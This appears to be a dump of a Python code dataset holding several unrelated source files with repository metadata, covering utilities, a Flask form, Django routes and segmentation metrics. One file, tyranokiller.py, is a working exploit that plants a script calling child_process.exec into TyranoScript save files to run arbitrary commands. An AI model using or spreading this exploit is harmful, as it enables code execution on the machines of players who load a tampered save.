| hexsha (string, len 40) | size (int64, 5 to 2.06M) | ext (string, 10 classes) | lang (string, 1 class) | max_stars_repo_path (string, len 3 to 248) | max_stars_repo_name (string, len 5 to 125) | max_stars_repo_head_hexsha (string, len 40 to 78) | max_stars_repo_licenses (list, len 1 to 10) | max_stars_count (int64, 1 to 191k, nullable) | max_stars_repo_stars_event_min_datetime (string, len 24, nullable) | max_stars_repo_stars_event_max_datetime (string, len 24, nullable) | max_issues_repo_path (string, len 3 to 248) | max_issues_repo_name (string, len 5 to 125) | max_issues_repo_head_hexsha (string, len 40 to 78) | max_issues_repo_licenses (list, len 1 to 10) | max_issues_count (int64, 1 to 67k, nullable) | max_issues_repo_issues_event_min_datetime (string, len 24, nullable) | max_issues_repo_issues_event_max_datetime (string, len 24, nullable) | max_forks_repo_path (string, len 3 to 248) | max_forks_repo_name (string, len 5 to 125) | max_forks_repo_head_hexsha (string, len 40 to 78) | max_forks_repo_licenses (list, len 1 to 10) | max_forks_count (int64, 1 to 105k, nullable) | max_forks_repo_forks_event_min_datetime (string, len 24, nullable) | max_forks_repo_forks_event_max_datetime (string, len 24, nullable) | content (string, len 5 to 2.06M) | avg_line_length (float64, 1 to 1.02M) | max_line_length (int64, 3 to 1.03M) | alphanum_fraction (float64, 0 to 1) | count_classes (int64, 0 to 1.6M) | score_classes (float64, 0 to 1) | count_generators (int64, 0 to 651k) | score_generators (float64, 0 to 1) | count_decorators (int64, 0 to 990k) | score_decorators (float64, 0 to 1) | count_async_functions (int64, 0 to 235k) | score_async_functions (float64, 0 to 1) | count_documentation (int64, 0 to 1.04M) | score_documentation (float64, 0 to 1) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
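
A minimal sketch of loading and filtering a table with this schema, assuming it is served as a Hugging Face dataset; the dataset path below is a hypothetical placeholder, not a confirmed name:

```python
# Sketch only: "user/python-files-annotated" is a made-up placeholder path.
from datasets import load_dataset

ds = load_dataset("user/python-files-annotated", split="train", streaming=True)

# Keep only rows whose files are comparatively well documented.
for row in ds:
    if row["score_documentation"] > 0.5:
        print(row["hexsha"], row["max_stars_repo_name"], row["size"])
        break
```
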
af8eb22a7a8fbb0ab152b78c299a3fc57959c738
| 163
|
py
|
Python
|
79.py
|
tarunbodapati/sum.c
|
c343d6ac530b7f433093138ac52474df4c9c4441
|
[
"MIT"
] | null | null | null |
79.py
|
tarunbodapati/sum.c
|
c343d6ac530b7f433093138ac52474df4c9c4441
|
[
"MIT"
] | null | null | null |
79.py
|
tarunbodapati/sum.c
|
c343d6ac530b7f433093138ac52474df4c9c4441
|
[
"MIT"
] | null | null | null |
# Report whether x*y is a perfect square; this loop only detects
# squares of i < 1000, i.e. products below 10**6.
x, y = map(int, input().split(" "))
count = 0
for i in range(0, 1000):
    if x * y == i * i:
        count += 1
if count == 1:
    print("yes")
else:
    print("no")
| 14.818182
| 31
| 0.484663
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 12
| 0.07362
|
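
The loop above caps detection at products below 10**6. A sketch of an uncapped variant using math.isqrt (Python 3.8+), assuming non-negative inputs:

```python
# Same perfect-square check without the 10**6 cap; assumes x*y >= 0.
import math

x, y = map(int, input().split(" "))
r = math.isqrt(x * y)
print("yes" if r * r == x * y else "no")
```
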
af92ace02dba087d489cb1e5f3f4aa495505fa6e
| 654
|
py
|
Python
|
examples/basic_elasticache_password_protected.py
|
rtkefreure/redis-py-cluster
|
f0627c91ce23e8784dbc996078428c9bdbacb20b
|
[
"MIT"
] | 1,075
|
2015-01-01T17:46:25.000Z
|
2022-03-31T17:55:18.000Z
|
examples/basic_elasticache_password_protected.py
|
rtkefreure/redis-py-cluster
|
f0627c91ce23e8784dbc996078428c9bdbacb20b
|
[
"MIT"
] | 397
|
2015-01-04T08:39:03.000Z
|
2022-03-22T01:59:18.000Z
|
examples/basic_elasticache_password_protected.py
|
rtkefreure/redis-py-cluster
|
f0627c91ce23e8784dbc996078428c9bdbacb20b
|
[
"MIT"
] | 373
|
2015-01-13T08:44:40.000Z
|
2022-03-29T02:18:20.000Z
|
from rediscluster import RedisCluster
rc = RedisCluster(
host='clustercfg.cfg-endpoint-name.aq25ta.euw1.cache.amazonaws.com',
port=6379,
password='password_is_protected',
skip_full_coverage_check=True, # Bypass Redis CONFIG call to elasticache
decode_responses=True, # decode_responses must be set to True when used with python3
ssl=True, # in-transit encryption, https://docs.aws.amazon.com/AmazonElastiCache/latest/red-ug/in-transit-encryption.html
ssl_cert_reqs=None # see https://github.com/andymccurdy/redis-py#ssl-connections
)
rc.set("foo", "bar")
print(rc.get("foo"))
| 40.875
| 148
| 0.704893
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 376
| 0.574924
|
af950ed2adf47bfd5bbac8fc2d72461c9405f310
| 1,809
|
py
|
Python
|
lemonspotter/samplers/declare.py
|
martinruefenacht/lemonspotter
|
4e24759aded6536bbb3cdcc311e5eaf72d52c4e3
|
[
"MIT"
] | null | null | null |
lemonspotter/samplers/declare.py
|
martinruefenacht/lemonspotter
|
4e24759aded6536bbb3cdcc311e5eaf72d52c4e3
|
[
"MIT"
] | 20
|
2019-11-14T16:35:42.000Z
|
2021-05-17T14:55:44.000Z
|
lemonspotter/samplers/declare.py
|
martinruefenacht/lemonspotter
|
4e24759aded6536bbb3cdcc311e5eaf72d52c4e3
|
[
"MIT"
] | null | null | null |
"""
This module contains the definition of the DefaultSampler.
"""
import logging
from typing import Iterable
from lemonspotter.core.parameter import Direction
from lemonspotter.core.sampler import Sampler
from lemonspotter.core.variable import Variable
from lemonspotter.core.function import Function
from lemonspotter.core.sample import FunctionSample
class DeclarationSampler(Sampler):
"""
This class implements the DefaultSampler behaviour. It uses the default values from the
specification types to create a single Variable.
"""
def __str__(self) -> str:
return type(self).__name__
def generate_samples(self, function: Function) -> Iterable[FunctionSample]:
"""
"""
logging.debug('DeclarationSampler used for %s', function.name)
def evaluator() -> bool:
raise NotImplementedError('DeclarationSampler only generates compilable ' +
'code, not runnable.')
# generate valid but empty arguments
arguments = []
variables = set()
for parameter in function.parameters: # type: ignore
if parameter.direction == Direction.OUT and parameter.type.dereferencable:
mem_alloc = f'malloc(sizeof({parameter.type.dereference().language_type}))'
variable = Variable(parameter.type, f'arg_{parameter.name}', mem_alloc)
variables.add(variable)
else:
variable = Variable(parameter.type, f'arg_{parameter.name}')
variables.add(variable)
logging.debug('declaring variable argument: %s', variable.name)
arguments.append(variable)
sample = FunctionSample(function, True, variables, arguments, evaluator)
return set([sample])
| 33.5
| 91
| 0.66335
| 1,450
| 0.801548
| 0
| 0
| 0
| 0
| 0
| 0
| 529
| 0.292427
|
af9558754aad314aeb8db737a2091bb0a63f662a
| 480
|
py
|
Python
|
source/python/LSWRC.py
|
JoHyukJun/algorithm-analysis
|
3eda22ce0eeb52490702206d73c04cff1eb3e72d
|
[
"Apache-2.0"
] | null | null | null |
source/python/LSWRC.py
|
JoHyukJun/algorithm-analysis
|
3eda22ce0eeb52490702206d73c04cff1eb3e72d
|
[
"Apache-2.0"
] | null | null | null |
source/python/LSWRC.py
|
JoHyukJun/algorithm-analysis
|
3eda22ce0eeb52490702206d73c04cff1eb3e72d
|
[
"Apache-2.0"
] | null | null | null |
'''
main.py
Created by JO HYUK JUN on 2021
Copyright © 2021 JO HYUK JUN. All rights reserved.
'''
class Solution:
def lengthOfLongestSubstring(self, s: str) -> int:
output = 0
str_set = []
for idx, val in enumerate(s):
if val in str_set:
str_set = str_set[str_set.index(val) + 1:]
str_set.append(val)
output = max(output, len(str_set))
return output
| 21.818182
| 58
| 0.525
| 366
| 0.760915
| 0
| 0
| 0
| 0
| 0
| 0
| 113
| 0.234927
|
af95fa980c5195e3c75aff212645fcf4a36ea392
| 2,532
|
py
|
Python
|
tyranokiller.py
|
satoki/tyranokiller
|
9a4d707ca9f0d2469e9cbd0b57f474b2c96c2d9d
|
[
"MIT"
] | 5
|
2021-12-23T11:23:40.000Z
|
2022-01-01T22:48:18.000Z
|
tyranokiller.py
|
satoki/tyranoscript_vulnerability
|
9a4d707ca9f0d2469e9cbd0b57f474b2c96c2d9d
|
[
"MIT"
] | null | null | null |
tyranokiller.py
|
satoki/tyranoscript_vulnerability
|
9a4d707ca9f0d2469e9cbd0b57f474b2c96c2d9d
|
[
"MIT"
] | null | null | null |
# Exploit Title: TyranoScript 5.13b - Arbitrary Code Execution
# Date: 27/03/2022
# Exploit Author: Satoki
# Vendor Homepage: https://tyrano.jp/
# Software Link: https://github.com/ShikemokuMK/tyranoscript
#
# Version (Save Data ACE):
# TyranoScriptV5 <= 5.04b
# TyranoScript <= 4.83
#
# Version (Development Data ACE):
# TyranoBuilder <= 1.87b
# TyranoBuilderV5 <= 2.03
# TyranoRider <= 2.20
# TyranoStudio <= 1.10d
# (TyranoScriptV5 <= 5.13b)
# (TyranoScript <= 4.88)
#
# Tested on: Windows
# CVE : 0day
#
# GitHub: https://github.com/satoki/tyranoscript_vulnerability
# Usage: python3 tyranokiller.py -c "calc" Test.sav
import os
import sys
import shutil
from argparse import ArgumentParser
argparser = ArgumentParser()
argparser.add_argument("filename", type=str, help="Specify the target sav file name")
argparser.add_argument("-c", "--command", type=str, default="calc", help="Specify the command to be injected")
args = argparser.parse_args()
filename = args.filename
command = args.command
print(f"\033[91m\
-------------------------------------------------------------\n\
| _____ _ _ _ |\n\
| /__ \_ _ _ __ __ _ _ __ ___ /\ /(_) | | ___ _ __ |\n\
| / /\/ | | | '__/ _` | '_ \ / _ \ / //_/ | | |/ _ \ '__| |\n\
| / / | |_| | | | (_| | | | | (_) / __ \| | | | __/ | |\n\
| \/ \__, |_| \__,_|_| |_|\___/\/ \/|_|_|_|\___|_| |\n\
| |___/ |\n\
| v1.1.0|\n\
-------------------------------------------------------------\n\
CVE-XXXX-XXXX\033[0m\n\
Target: {filename}\n\
Command: {command}\n\
------------------------------------------------------------")
if not os.path.isfile(filename):
print("Error: sav file doesn't exist.")
sys.exit(1)
if "\"" in command:
print("Error: Double quotes can't be used in the command.")
sys.exit(1)
shutil.copyfile(filename, f"{filename}.bk")
savfile = open(f"{filename}.bk", mode="r")
data = savfile.read()
savfile.close()
command = command.replace("\\", "\\\\")
code = f"\
alert('Injected_by_TyranoKiller_!!!!');\
require('child_process').exec(`{command}`);\
"
data = data.replace("%3C/div%3E", f"%3C/div%3E%3Cscript%3E{code}%3C/script%3E", 1)
code = code.replace(";", ";\n")
print(f"Code:\n\033[96m{code}\033[0m\
------------------------------------------------------------")
savfile = open(filename, mode="w")
savfile.write(data)
savfile.close()
print("Completed.")
| 30.506024
| 110
| 0.527646
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,847
| 0.729463
|
af97ce7ed6690110d340cf7da5e8b723433180ff
| 526
|
py
|
Python
|
forms.py
|
MarioAer/BubblesData
|
849cc6428b5e8d64f5517f94a714e3f737bfc75d
|
[
"MIT"
] | null | null | null |
forms.py
|
MarioAer/BubblesData
|
849cc6428b5e8d64f5517f94a714e3f737bfc75d
|
[
"MIT"
] | null | null | null |
forms.py
|
MarioAer/BubblesData
|
849cc6428b5e8d64f5517f94a714e3f737bfc75d
|
[
"MIT"
] | null | null | null |
# -*- coding: UTF-8 -*-
"""(forms.py) Flask-Login Example: Login Form"""
from flask_wtf import Form # import from flask_wtf, NOT wtforms
from wtforms import StringField, PasswordField
from wtforms.validators import InputRequired, Length
# Define the LoginForm class by sub-classing Form
class LoginForm(Form):
# This form contains two fields with validators
name = StringField(u'User Name:', validators=[InputRequired(), Length(max=20)])
passwd = PasswordField(u'Password:', validators=[Length(min=4, max=16)])
| 40.461538
| 83
| 0.741445
| 235
| 0.446768
| 0
| 0
| 0
| 0
| 0
| 0
| 228
| 0.43346
|
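
A hypothetical Flask view using the LoginForm above; the route and the SECRET_KEY value are placeholders (Flask-WTF requires a secret key for CSRF protection):

```python
# Sketch only: route and secret key are made up for illustration.
from flask import Flask

app = Flask(__name__)
app.config['SECRET_KEY'] = 'change-me'  # required by Flask-WTF for CSRF

@app.route('/login', methods=['GET', 'POST'])
def login():
    form = LoginForm()
    if form.validate_on_submit():
        return 'Hello, {}!'.format(form.name.data)
    return 'Please log in', 400
```
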
af9c8aaccf0095264c9bcfb36a5958fdb4382d26
| 1,322
|
py
|
Python
|
core/loader.py
|
1x-eng/ext-a-cy
|
d6efbabca89243c9c41ce4c130e9f963b2b42229
|
[
"MIT"
] | null | null | null |
core/loader.py
|
1x-eng/ext-a-cy
|
d6efbabca89243c9c41ce4c130e9f963b2b42229
|
[
"MIT"
] | null | null | null |
core/loader.py
|
1x-eng/ext-a-cy
|
d6efbabca89243c9c41ce4c130e9f963b2b42229
|
[
"MIT"
] | null | null | null |
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.common.exceptions import TimeoutException
__author__='Pruthvi Kumar'
# 30 June 2019.
# pruthvikumar.123@gmail.com
# Load the web page at the given URL and wait for the given DOM element, up to the specified time.
class LoadPage:
def __init__(self, url, dom_id, wait_time=5):
super(LoadPage, self).__init__()
self.url = url
self.dom_id = dom_id
self.wait_time = wait_time
self.driver = webdriver.Chrome()
def extractor(self):
try:
self.driver.get(self.url)
            # Wait as long as required, up to a maximum of wait_time seconds, for the element to appear
# If successful, retrieves the element
WebDriverWait(self.driver, self.wait_time).until(EC.presence_of_element_located((By.ID, self.dom_id)))
# If you wanted to do any activity like login etc., conduct that here.
return self.driver.page_source
        except TimeoutException:
print("Failed to load page / Failed to wait until {} element was loaded @ "
"{}.".format(self.dom_id, self.url))
finally:
self.driver.quit()
| 33.897436
| 114
| 0.67171
| 910
| 0.688351
| 0
| 0
| 0
| 0
| 0
| 0
| 400
| 0.302572
|
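
Hypothetical usage of the LoadPage class above; the URL and DOM id are placeholders, and a local Chrome plus chromedriver is assumed:

```python
# Sketch only: URL and element id are made up.
loader = LoadPage('https://example.com', 'content', wait_time=10)
html = loader.extractor()
if html is not None:
    print(len(html), 'characters of page source')
```
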
af9cba96e04a6dafd8fe9ffe1a97e239f33fd7e2
| 188
|
py
|
Python
|
improutils/__init__.py
|
ImprolabFIT/improutils
|
84666f88db594dd5d24cf946c635df37643ed309
|
[
"MIT"
] | null | null | null |
improutils/__init__.py
|
ImprolabFIT/improutils
|
84666f88db594dd5d24cf946c635df37643ed309
|
[
"MIT"
] | null | null | null |
improutils/__init__.py
|
ImprolabFIT/improutils
|
84666f88db594dd5d24cf946c635df37643ed309
|
[
"MIT"
] | null | null | null |
from .other import *
from .acquisition import *
from .filtration import *
from .preprocessing import *
from .recognition import *
from .segmentation import *
from .visualisation import *
| 20.888889
| 28
| 0.771277
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
af9cf05604e40321edbad3928cd57491f9b1fcff
| 1,598
|
py
|
Python
|
Classicist Express/api/urls.py
|
RisalatShahriar/ccNews
|
d7b73bff86ac938d47be4f97d04a81af9ed00faf
|
[
"Apache-2.0"
] | null | null | null |
Classicist Express/api/urls.py
|
RisalatShahriar/ccNews
|
d7b73bff86ac938d47be4f97d04a81af9ed00faf
|
[
"Apache-2.0"
] | null | null | null |
Classicist Express/api/urls.py
|
RisalatShahriar/ccNews
|
d7b73bff86ac938d47be4f97d04a81af9ed00faf
|
[
"Apache-2.0"
] | null | null | null |
from django.urls import path
from . import views
urlpatterns = [
path('bd', views.bdaffair, name="bd_api"),
path('home', views.home_data, name='home_api'),
path('cultural', views.cultural_insights, name='cultural_api'),
path('sports', views.sports_insights, name='sports_api'),
path('international', views.internatioal, name='achievements_api'),
path('interview', views.interviews, name='interview_api'),
path('cc', views.cc, name='cc_api'),
path('youth', views.youth, name='youth_api'),
path('district', views.district_insights, name='district_api'),
path('comics', views.comics, name='comics_api'),
path('trending', views.trending, name='trending_api'),
path('diversed', views.diversed, name='diversed_api'),
path('bd/top', views.bdaffair_top, name="top_bd_api"),
path('home/top', views.home_data_top, name='top_home_api'),
path('cultural/top', views.cultural_insights_top, name='top_cultural_api'),
path('sports/top', views.sports_insights_top, name='top_sports_api'),
path('international/top', views.internatioal_top, name='top_achievements_api'),
path('interview/top', views.interviews_top, name='top_interview_api'),
path('cc/top', views.cc_top, name='top_cc_api'),
path('youth/top', views.youth_top, name='top_youth_api'),
path('district/top', views.district_insights_top, name='top_district_api'),
path('comics/top', views.comics_top, name='top_comics_api'),
path('trending/top', views.trending_top, name='top_trending_api'),
path('diversed/top', views.diversed_top, name='top_diversed_api')
]
| 55.103448
| 83
| 0.71214
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 602
| 0.376721
|
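
A sketch of resolving one of the named routes above with Django's reverse(); this assumes the urls.py is wired into the project's ROOT_URLCONF via include():

```python
from django.urls import reverse

url = reverse('bd_api')  # e.g. '/bd', plus whatever prefix include() adds
```
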
af9ec8c3e054bbb041579522842ad9b2da17d23a
| 11,544
|
py
|
Python
|
farmer/ncc/metrics/segmentation_metrics.py
|
aiorhiroki/farmer.tf2
|
5d78f4b47b753ab2d595829c17fef7c6061235b5
|
[
"Apache-2.0"
] | null | null | null |
farmer/ncc/metrics/segmentation_metrics.py
|
aiorhiroki/farmer.tf2
|
5d78f4b47b753ab2d595829c17fef7c6061235b5
|
[
"Apache-2.0"
] | 7
|
2021-11-12T05:58:48.000Z
|
2022-02-25T07:05:26.000Z
|
farmer/ncc/metrics/segmentation_metrics.py
|
aiorhiroki/farmer.tf2
|
5d78f4b47b753ab2d595829c17fef7c6061235b5
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from pathlib import Path
import itertools
from tqdm import tqdm
from ..utils import get_imageset
import matplotlib.pyplot as plt
import cv2
import json
from ..metrics.surface_dice import metrics as surface_distance
from ..metrics.functional import calc_isolated_fp
def calc_segmentation_metrics(confusion):
tp = np.diag(confusion)
fp = np.sum(confusion, 0) - tp
fn = np.sum(confusion, 1) - tp
tn = np.sum(confusion) - (fp + fn + tp)
iou = calc_iou_from_confusion(tp, fp, fn)
dice = calc_dice_from_confusion(tp, fp, fn)
precision = calc_precision_from_confusion(tp, fp)
recall = calc_recall_from_confusion(tp, fn)
    specificity = calc_specificity_from_confusion(tn, fp)
return {
'iou': iou,
'dice': dice,
'precision': precision,
'recall': recall,
        'specificity': specificity
}
def iou_dice_val(
nb_classes,
dataset,
model,
batch_size
):
confusion = np.zeros((nb_classes, nb_classes), dtype=np.int32)
print('\nvalidation...')
for i, (image, mask) in enumerate(tqdm(dataset)):
if i == 0:
images = np.zeros((batch_size,) + image.shape, dtype=image.dtype)
masks = np.zeros((batch_size,) + mask.shape, dtype=mask.dtype)
image_index = i % batch_size
images[image_index] = image
masks[image_index] = mask
if i == len(dataset) - 1 or image_index == batch_size - 1:
output = model.predict(images)
for j in range(image_index + 1):
confusion += calc_segmentation_confusion(
output[j], masks[j], nb_classes)
images[:] = 0
masks[:] = 0
return calc_segmentation_metrics(confusion)
def calc_segmentation_confusion(y_pred, y_true, nb_classes):
# Convert predictions and target from categorical to integer format
# y_pred: onehot, y_true: onehot
y_pred = np.argmax(y_pred, axis=-1).ravel()
y_true = np.argmax(y_true, axis=-1).ravel()
x = y_pred + nb_classes * y_true
bincount_2d = np.bincount(
x.astype(np.int32), minlength=nb_classes**2)
assert bincount_2d.size == nb_classes**2
confusion = bincount_2d.reshape((nb_classes, nb_classes))
return confusion
def calc_iou_from_confusion(tp, fp, fn):
with np.errstate(divide='ignore', invalid='ignore'):
iou = tp / (tp + fp + fn)
iou[np.isnan(iou)] = 0
return [float(i) for i in iou]
def calc_dice_from_confusion(tp, fp, fn):
with np.errstate(divide='ignore', invalid='ignore'):
dice = 2 * tp / (2 * tp + fp + fn)
dice[np.isnan(dice)] = 0
return [float(d) for d in dice]
def calc_precision_from_confusion(tp, fp):
with np.errstate(divide='ignore', invalid='ignore'):
precision = tp / (tp + fp)
precision[np.isnan(precision)] = 0
return [float(p) for p in precision]
def calc_recall_from_confusion(tp, fn):
with np.errstate(divide='ignore', invalid='ignore'):
recall = tp / (tp + fn)
recall[np.isnan(recall)] = 0
return [float(r) for r in recall]
def calc_specificity_from_confusion(tn, fp):
    with np.errstate(divide='ignore', invalid='ignore'):
        specificity = tn / (fp + tn)
        specificity[np.isnan(specificity)] = 0
    return [float(s) for s in specificity]
def detection_rate_confusions(pred_labels, gt_labels, nb_classes):
"""
gt_labels: iterable container (Width, Height)
prediction_labels: iterable container (Width, Height)
nb_classes: number of classes
"""
    confusion_table = np.zeros((nb_classes, 4), dtype=np.uint8)
    for gt_label, pred_label in zip(gt_labels, pred_labels):
        for class_id in range(nb_classes):
            gt_mask = gt_label == class_id
            pred_mask = pred_label == class_id
            if np.sum(gt_mask) == 0 and np.sum(pred_mask) == 0:
                confusion_table[class_id, 0] += 1
            elif np.sum(gt_mask) == 0 and np.sum(pred_mask) > 0:
                confusion_table[class_id, 1] += 1
            elif np.sum(gt_mask * pred_mask) == 0:
                confusion_table[class_id, 2] += 1
            else:
                confusion_table[class_id, 3] += 1
    return confusion_table
def plot_confusion_matrix(cm, classes,
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Blues,
save_file=None):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
"""
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print("Normalized confusion matrix")
else:
print('Confusion matrix, without normalization')
print(cm)
plt.figure()
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, format(cm[i, j], fmt),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.ylabel('True label')
plt.xlabel('Predicted label')
plt.tight_layout()
plt.savefig('{}.png'.format(save_file))
def calc_surface_dice(pred_out, gt_label, nb_classes, vertical=1.0, horizontal=1.0, tolerance=0.0):
"""
surface dice calculation
Args:
pred_out (np.array, shape (h,w,nb_classes)): prediction output.
gt_mask (np.array, shape (h,w)): ground truth mask.
nb_classes (int): the number of classes
vertical (float, optional): real length (mm) of pixel in the vertical direction. Defaults to 1.0.
horizontal (float, optional): real length (mm) of pixel in the horizontal direction. Defaults to 1.0.
tolerance (float, optional): acceptable tolerance (mm) of boundary. Defaults to 0.0.
Returns:
surface_dice (float):
"""
class_surface_dice = list()
# convert array (value: class_id)
pred_label = np.uint8(np.argmax(pred_out, axis=2))
gt_label = np.uint8(np.argmax(gt_label, axis=2))
for class_id in range(nb_classes):
gt_mask = gt_label == class_id
pred_mask = pred_label == class_id
# convert bool np.array mask
        gt_mask = np.asarray(gt_mask, dtype=bool)
        pred_mask = np.asarray(pred_mask, dtype=bool)
surface_distances = surface_distance.compute_surface_distances(
gt_mask,
pred_mask,
spacing_mm=(vertical, horizontal))
surface_dice = surface_distance.compute_surface_dice_at_tolerance(surface_distances, tolerance_mm=tolerance)
class_surface_dice.append(surface_dice)
return class_surface_dice
def calc_weighted_dice(confusion, isolated_fp, nb_classes, isolated_fp_weights=15.0):
"""
weighted dice calculation
Args:
confusion (np.array): confusion matrix.
isolated_fp (np.array): isolated fp for each class.
isolated_fp_weight (dict or float): isolated fp weights for each class. Defaults to 15.0.
Returns:
weighted_dice (np.array)
"""
if isinstance(isolated_fp_weights, float):
isolated_fp_weights = {i: isolated_fp_weights for i in range(nb_classes)}
assert isinstance(isolated_fp_weights, dict)
sorted_weights = sorted(isolated_fp_weights.items(), key=lambda x: x[0])
isolated_fp_weights = np.asarray([v for _, v in sorted_weights])
tp = np.diag(confusion)
connected_fp = np.sum(confusion, 0) - tp - isolated_fp
fn = np.sum(confusion, 1) - tp
class_w_dice = 2 * tp / (2 * tp + fn + connected_fp + isolated_fp_weights * isolated_fp)
return class_w_dice
def generate_segmentation_result(
nb_classes,
dataset,
model,
save_dir,
batch_size,
sdice_tolerance,
isolated_fp_weights
):
confusion_all = np.zeros((nb_classes, nb_classes), dtype=np.int32)
image_dice_list = list()
dice_list = list()
surface_dice_list = list()
isolated_fp_all = np.zeros(nb_classes, dtype=np.int32)
print('\nsave predicted image...')
for i, (image, mask) in enumerate(tqdm(dataset)):
if i == 0:
images = np.zeros((batch_size,) + image.shape, dtype=image.dtype)
masks = np.zeros((batch_size,) + mask.shape, dtype=mask.dtype)
batch_index = i // batch_size
image_index = i % batch_size
images[image_index] = image
masks[image_index] = mask
if i == len(dataset) - 1 or image_index == batch_size - 1:
output = model.predict(images)
for j in range(image_index + 1):
confusion = calc_segmentation_confusion(
output[j], masks[j], nb_classes)
metrics = calc_segmentation_metrics(confusion)
dice = metrics['dice']
surface_dice = calc_surface_dice(output[j], masks[j], nb_classes, tolerance=sdice_tolerance)
isolated_fp = calc_isolated_fp(output[j], masks[j], nb_classes)
weighted_dice = calc_weighted_dice(
confusion, isolated_fp, nb_classes, isolated_fp_weights=isolated_fp_weights)
result_image = get_imageset(
images[j], output[j], masks[j],
put_text = f'dice: {np.round(dice, 3)} ' \
f'surface dice: {np.round(surface_dice, 3)} ' \
f'weighted dice: {np.round(weighted_dice, 3)}')
data_index = batch_index * batch_size + j
*input_file, _ = dataset.annotations[data_index]
image_path = Path(input_file[0])
save_image_dir = Path(save_dir) / image_path.parent.name
save_image_dir.mkdir(exist_ok=True)
save_image_path = str(save_image_dir / image_path.name)
image_dice_list.append([save_image_path, dice])
dice_list.append(dice)
surface_dice_list.append([save_image_path, surface_dice])
result_image_out = result_image[:, :, ::-1] # RGB => BGR
cv2.imwrite(save_image_path, result_image_out)
confusion_all += confusion
isolated_fp_all += isolated_fp
images[:] = 0
masks[:] = 0
with open(f"{save_dir}/dice.json", "w") as fw:
json.dump(image_dice_list, fw, ensure_ascii=True, indent=4)
with open(f"{save_dir}/surface_dice.json", "w") as fw:
json.dump(surface_dice_list, fw, ensure_ascii=True, indent=4)
dice_class_axis = np.array(dice_list).T.tolist()
for i in range(len(dice_class_axis)):
plt.figure()
plt.hist(dice_class_axis[i])
plt.savefig(f"{save_dir}/dice_hist_class_{i}.png")
metrics = calc_segmentation_metrics(confusion_all)
# append surface_dice and weighted_dice to metrics
mean_surface_dice = np.mean(list(map(lambda x: x[1], surface_dice_list)), axis=0)
metrics['surface_dice'] = [float(x) for x in mean_surface_dice]
metrics['weighted_dice'] = calc_weighted_dice(
confusion_all, isolated_fp_all, nb_classes, isolated_fp_weights=isolated_fp_weights)
return metrics
| 34.981818
| 116
| 0.628638
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,988
| 0.172211
|
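
A standalone sketch of the bincount trick used in calc_segmentation_confusion above: each (true, pred) pair is encoded as one integer, and the codes are histogrammed into a confusion matrix.

```python
import numpy as np

nb_classes = 2
y_true = np.array([0, 0, 1, 1])  # ground-truth class ids
y_pred = np.array([0, 1, 1, 1])  # predicted class ids

codes = y_pred + nb_classes * y_true  # each pair maps into [0, nb_classes**2)
confusion = np.bincount(codes, minlength=nb_classes**2).reshape(nb_classes, nb_classes)
print(confusion)  # [[1 1]   rows = true class,
                  #  [0 2]]  cols = predicted class
```
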
af9f58fe0e660b08a353e17203614fe5d6b9e0d5
| 46
|
py
|
Python
|
chatbot/__init__.py
|
rdorado79/chatbotlib
|
bfe44593fe218d13a8c55f80f0c13db67605a5b2
|
[
"MIT"
] | null | null | null |
chatbot/__init__.py
|
rdorado79/chatbotlib
|
bfe44593fe218d13a8c55f80f0c13db67605a5b2
|
[
"MIT"
] | null | null | null |
chatbot/__init__.py
|
rdorado79/chatbotlib
|
bfe44593fe218d13a8c55f80f0c13db67605a5b2
|
[
"MIT"
] | null | null | null |
# Example package with a console entry point
| 15.333333
| 44
| 0.782609
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 44
| 0.956522
|
afa04ed205e39049b31fa8fd4108f5232fadca75
| 1,774
|
py
|
Python
|
mrbaviirc/template/actions/action_var.py
|
brianvanderburg2/python-mrbaviirc-template
|
6da213b30580d66fe7231c40bb7bbebb026a0789
|
[
"Apache-2.0"
] | null | null | null |
mrbaviirc/template/actions/action_var.py
|
brianvanderburg2/python-mrbaviirc-template
|
6da213b30580d66fe7231c40bb7bbebb026a0789
|
[
"Apache-2.0"
] | null | null | null |
mrbaviirc/template/actions/action_var.py
|
brianvanderburg2/python-mrbaviirc-template
|
6da213b30580d66fe7231c40bb7bbebb026a0789
|
[
"Apache-2.0"
] | null | null | null |
""" Handler for the var action tag. """
# pylint: disable=too-few-public-methods,too-many-arguments,protected-access,unused-argument
__author__ = "Brian Allen Vanderburg II"
__copyright__ = "Copyright 2016-2019"
__license__ = "Apache License 2.0"
from . import ActionHandler, DefaultActionHandler
from ..nodes import Node, NodeList
from ..renderers import StringRenderer
class VarNode(Node):
""" Capture output into a variable. """
def __init__(self, template, line, var):
""" Initialize. """
Node.__init__(self, template, line)
self.var = var
self.nodes = NodeList()
def render(self, state):
""" Render the results and capture into a variable. """
new_renderer = state.push_renderer()
try:
self.nodes.render(state)
contents = new_renderer.get()
state.set_var(self.var[0], contents, self.var[1])
finally:
state.pop_renderer()
class VarActionHandler(ActionHandler):
""" Handle var """
def handle_action_var(self, line, start, end):
""" Handle var """
var = self.parser.get_token_var(start, end, allow_type=True)
start += 1
self.parser.get_no_more_tokens(start, end)
node = VarNode(self.template, line, var)
self.parser.add_node(node)
self.parser.push_nodestack(node.nodes)
self.parser.push_handler(VarSubHandler(self.parser, self.template))
class VarSubHandler(DefaultActionHandler):
""" Handle items under var """
